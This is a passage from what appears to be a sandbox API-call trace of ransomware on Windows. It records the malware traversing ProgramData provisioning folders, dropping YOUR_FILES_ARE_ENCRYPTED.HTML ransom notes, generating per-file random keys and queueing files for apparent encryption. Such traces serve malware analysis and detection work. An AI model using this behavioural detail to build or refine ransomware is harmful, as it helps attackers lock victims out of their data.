ftLastWriteTime.dwLowDateTime=0xa166c88f, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0106.935] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.935] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml") returned 100 [0106.935] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0106.935] lstrlenW (lpString=".xml") returned 4 [0106.935] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0106.935] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.935] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x314 [0106.936] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=271) returned 1 [0106.936] CloseHandle (hObject=0x314) returned 1 [0106.936] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 1 [0106.936] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.936] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov") returned 85 [0106.936] GetProcessHeap () returned 0x600000 [0106.936] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0106.937] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov" [0106.937] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\*" [0106.937] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0106.937] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0106.937] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime", cAlternateFileName="")) returned 1 [0106.937] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.937] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime") returned 93 [0106.937] GetProcessHeap () returned 0x600000 [0106.937] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x682358 [0106.938] lstrcpyW (in: lpString1=0x682358, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime" [0106.938] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\*" [0106.938] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0106.939] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="..", cAlternateFileName="")) returned 1 [0106.940] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa16203b1, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa16203b1, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1646620, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x21b, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0106.940] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.940] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml") returned 109 [0106.940] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0106.940] lstrlenW (lpString=".provxml") returned 8 [0106.940] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0106.940] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa16203b1, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa16203b1, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1646620, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x21b, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 0 [0106.940] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0106.940] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0106.940] GetProcessHeap () returned 0x600000 [0106.940] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315c020 [0106.940] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0106.941] WriteFile (in: hFile=0x310, lpBuffer=0x315c020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x315c020*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0106.942] CloseHandle (hObject=0x310) returned 1 [0106.942] GetProcessHeap () returned 0x600000 [0106.942] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315c020 | out: hHeap=0x600000) returned 1 [0106.942] GetProcessHeap () returned 0x600000 [0106.942] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x682358 | out: hHeap=0x600000) returned 1 [0106.943] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1646620, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1646620, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1646620, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xcb, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0106.943] StrStrIW (lpFirst="RunTime.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.943] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml") returned 97 [0106.943] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0106.943] lstrlenW (lpString=".xml") returned 4 [0106.943] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0106.943] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0106.943] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0106.944] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=203) returned 1 [0106.944] CloseHandle (hObject=0x310) returned 1 [0106.944] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1646620, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1646620, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1646620, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xcb, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0106.944] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0106.944] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0106.944] GetProcessHeap () returned 0x600000 [0106.944] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0106.944] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0106.945] WriteFile (in: hFile=0x314, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0106.945] CloseHandle (hObject=0x314) returned 1 [0106.946] GetProcessHeap () returned 0x600000 [0106.946] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0106.946] GetProcessHeap () returned 0x600000 [0106.946] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0106.947] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 0 [0106.947] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0106.947] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0106.947] GetProcessHeap () returned 0x600000 [0106.947] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ee9d8 [0106.947] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0106.947] WriteFile (in: hFile=0x308, lpBuffer=0x6ee9d8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ee9d8*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.948] CloseHandle (hObject=0x308) returned 1 [0106.949] GetProcessHeap () returned 0x600000 [0106.949] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ee9d8 | out: hHeap=0x600000) returned 1 [0106.949] GetProcessHeap () returned 0x600000 [0106.949] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0106.950] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="{99b095d8-5959-4820-bea7-7448c8427b4e}", cAlternateFileName="{99B09~1")) returned 1 [0106.950] StrStrIW (lpFirst="{99b095d8-5959-4820-bea7-7448c8427b4e}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.950] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}") returned 80 [0106.950] GetProcessHeap () returned 0x600000 [0106.950] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0106.951] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}" [0106.951] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*" [0106.951] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0106.961] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0106.961] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0ce2cc2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0ce2cc2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0ce2cc2, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x8b2, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1 [0106.961] StrStrIW (lpFirst="customizations.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.961] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml") returned 99 [0106.961] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0106.961] lstrlenW (lpString=".xml") returned 4 [0106.961] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0106.961] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.961] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0106.962] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=2226) returned 1 [0106.962] GetProcessHeap () returned 0x600000 [0106.962] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3163dd0 [0106.964] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="94") returned 2 [0106.964] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="F5") returned 2 [0106.965] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="FE") returned 2 [0106.965] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="FB") returned 2 [0106.965] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="71") returned 2 [0106.965] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="AD") returned 2 [0106.965] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="E4") returned 2 [0106.965] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="E2") returned 2 [0106.965] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="41") returned 2 [0106.965] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="D8") returned 2 [0106.965] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="2C") returned 2 [0106.965] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="B4") returned 2 [0106.965] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="05") returned 2 [0106.965] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="7F") returned 2 [0106.965] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="0E") returned 2 [0106.965] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="D2") returned 2 [0106.965] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="68") returned 2 [0106.965] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="B2") returned 2 [0106.965] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="EC") returned 2 [0106.965] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="99") returned 2 [0106.965] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="EA") returned 2 [0106.965] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="6D") returned 2 [0106.965] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="0D") returned 2 [0106.965] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="99") returned 2 [0106.965] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="18") returned 2 [0106.965] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="DB") returned 2 [0106.965] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="88") returned 2 [0106.965] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="39") returned 2 [0106.965] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="3D") returned 2 [0106.965] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="FC") returned 2 [0106.965] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="8F") returned 2 [0106.965] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="2A") returned 2 [0106.966] lstrcpyW (in: lpString1=0x3173e84, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml" [0106.966] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3163dd0, NumberOfConcurrentThreads=0x0) returned 0x274 [0106.966] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3163dd0, lpOverlapped=0x3163dd0) returned 1 [0106.966] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0c7056c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0c7056c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0c7056c, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 